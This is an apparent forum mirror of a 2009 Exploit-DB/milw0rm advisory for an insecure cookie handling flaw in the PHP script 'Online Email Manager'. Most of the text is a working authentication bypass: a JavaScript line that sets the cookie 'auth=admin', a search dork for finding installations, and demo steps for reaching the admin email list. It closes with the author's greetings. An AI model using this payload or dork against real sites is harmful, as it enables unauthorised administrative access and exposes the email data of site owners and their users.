- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8476
- Проверка EDB
-
- Пройдено
- Автор
- HUSSIN X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-04-17
Код:
Online Email Manager Insecure Cookie Handling Vulnerability
{____________________________________}
Author: Hussin X
Home : WwW.IQ-TY.CoM
email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}
script : http://www.esoftpro.com/web_scripts_online_email_manager.phps
DorK : Powered by Online Email Manager
exploit:
javascript:document.cookie = "auth=admin; path=/";
exploit for demo
|# http://www.esoftpro.com/demo/OEM/admin/index.php
|ex javascript:document.cookie = "auth=admin; path=/";
|# go to url "emailList.php"
|# http://www.esoftpro.com/demo/OEM/admin/emailList.php
|# you login in to admin page :d
Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }
end.
# milw0rm.com [2009-04-17]- Источник
- www.exploit-db.com
